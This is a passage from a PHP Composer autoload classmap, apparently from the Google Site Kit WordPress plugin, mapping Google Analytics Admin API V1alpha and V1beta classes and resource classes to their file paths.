'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaListCustomDimensionsResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaListCustomDimensionsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaListCustomMetricsResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaListCustomMetricsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaListDataStreamsResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaListDataStreamsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaListDisplayVideo360AdvertiserLinkProposalsResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaListDisplayVideo360AdvertiserLinkProposalsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaListDisplayVideo360AdvertiserLinksResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaListDisplayVideo360AdvertiserLinksResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaListFirebaseLinksResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaListFirebaseLinksResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaListGoogleAdsLinksResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaListGoogleAdsLinksResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaListIosAppDataStreamsResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaListIosAppDataStreamsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaListMeasurementProtocolSecretsResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaListMeasurementProtocolSecretsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaListPropertiesResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaListPropertiesResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaListSearchAds360LinksResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaListSearchAds360LinksResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaListUserLinksResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaListUserLinksResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaListWebDataStreamsResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaListWebDataStreamsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaNumericValue' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaNumericValue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaProperty' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaProperty.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaPropertySummary' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaPropertySummary.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaProvisionAccountTicketRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaProvisionAccountTicketRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaProvisionAccountTicketResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaProvisionAccountTicketResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaRunAccessReportRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaRunAccessReportRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaRunAccessReportResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaRunAccessReportResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaSearchAds360Link' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaSearchAds360Link.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaSearchChangeHistoryEventsRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaSearchChangeHistoryEventsRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaSearchChangeHistoryEventsResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaSearchChangeHistoryEventsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaUpdateUserLinkRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaUpdateUserLinkRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaUserLink' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaUserLink.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaWebDataStream' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaWebDataStream.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessBetweenFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessBetweenFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessDateRange' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessDateRange.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessDimension' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessDimension.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessDimensionHeader' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessDimensionHeader.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessDimensionValue' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessDimensionValue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessFilterExpression' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessFilterExpression.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessFilterExpressionList' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessFilterExpressionList.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessInListFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessInListFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessMetric' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessMetric.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessMetricHeader' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessMetricHeader.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessMetricValue' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessMetricValue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessNumericFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessNumericFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessOrderBy' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessOrderBy.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessOrderByDimensionOrderBy' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessOrderByDimensionOrderBy.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessOrderByMetricOrderBy' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessOrderByMetricOrderBy.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessQuota' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessQuota.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessQuotaStatus' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessQuotaStatus.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessRow' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessRow.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccessStringFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccessStringFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccount' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccount.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAccountSummary' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAccountSummary.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAcknowledgeUserDataCollectionRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAcknowledgeUserDataCollectionRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaAcknowledgeUserDataCollectionResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaAcknowledgeUserDataCollectionResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaArchiveCustomDimensionRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaArchiveCustomDimensionRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaArchiveCustomMetricRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaArchiveCustomMetricRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaChangeHistoryChange' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaChangeHistoryChange.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaChangeHistoryChangeChangeHistoryResource' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaChangeHistoryChangeChangeHistoryResource.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaChangeHistoryEvent' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaChangeHistoryEvent.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaConversionEvent' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaConversionEvent.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaConversionEventDefaultConversionValue' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaConversionEventDefaultConversionValue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaCustomDimension' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaCustomDimension.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaCustomMetric' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaCustomMetric.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaDataRetentionSettings' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaDataRetentionSettings.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaDataSharingSettings' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaDataSharingSettings.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaDataStream' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaDataStream.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaDataStreamAndroidAppStreamData' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaDataStreamAndroidAppStreamData.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaDataStreamIosAppStreamData' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaDataStreamIosAppStreamData.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaDataStreamWebStreamData' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaDataStreamWebStreamData.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaFirebaseLink' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaFirebaseLink.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaGoogleAdsLink' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaGoogleAdsLink.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaKeyEvent' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaKeyEvent.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaKeyEventDefaultValue' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaKeyEventDefaultValue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaListAccountSummariesResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaListAccountSummariesResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaListAccountsResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaListAccountsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaListConversionEventsResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaListConversionEventsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaListCustomDimensionsResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaListCustomDimensionsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaListCustomMetricsResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaListCustomMetricsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaListDataStreamsResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaListDataStreamsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaListFirebaseLinksResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaListFirebaseLinksResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaListGoogleAdsLinksResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaListGoogleAdsLinksResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaListKeyEventsResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaListKeyEventsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaListMeasurementProtocolSecretsResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaListMeasurementProtocolSecretsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaListPropertiesResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaListPropertiesResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaMeasurementProtocolSecret' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaMeasurementProtocolSecret.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaNumericValue' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaNumericValue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaProperty' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaProperty.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaPropertySummary' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaPropertySummary.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaProvisionAccountTicketRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaProvisionAccountTicketRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaProvisionAccountTicketResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaProvisionAccountTicketResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaRunAccessReportRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaRunAccessReportRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaRunAccessReportResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaRunAccessReportResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaSearchChangeHistoryEventsRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaSearchChangeHistoryEventsRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1betaSearchChangeHistoryEventsResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1betaSearchChangeHistoryEventsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleProtobufEmpty' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleProtobufEmpty.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\AccountSummaries' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/AccountSummaries.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\Accounts' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/Accounts.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\AccountsUserLinks' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/AccountsUserLinks.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\Properties' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/Properties.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\PropertiesAndroidAppDataStreams' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/PropertiesAndroidAppDataStreams.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\PropertiesAndroidAppDataStreamsMeasurementProtocolSecrets' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/PropertiesAndroidAppDataStreamsMeasurementProtocolSecrets.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\PropertiesAudiences' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/PropertiesAudiences.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\PropertiesConversionEvents' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/PropertiesConversionEvents.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\PropertiesCustomDimensions' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/PropertiesCustomDimensions.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\PropertiesCustomMetrics' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/PropertiesCustomMetrics.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\PropertiesDataStreams' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/PropertiesDataStreams.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\PropertiesDataStreamsMeasurementProtocolSecrets' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/PropertiesDataStreamsMeasurementProtocolSecrets.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\PropertiesDisplayVideo360AdvertiserLinkProposals' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/PropertiesDisplayVideo360AdvertiserLinkProposals.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\PropertiesDisplayVideo360AdvertiserLinks' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/PropertiesDisplayVideo360AdvertiserLinks.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\PropertiesFirebaseLinks' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/PropertiesFirebaseLinks.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\PropertiesGoogleAdsLinks' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/PropertiesGoogleAdsLinks.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\PropertiesIosAppDataStreams' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/PropertiesIosAppDataStreams.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\PropertiesIosAppDataStreamsMeasurementProtocolSecrets' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/PropertiesIosAppDataStreamsMeasurementProtocolSecrets.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\PropertiesKeyEvents' => $baseDir . 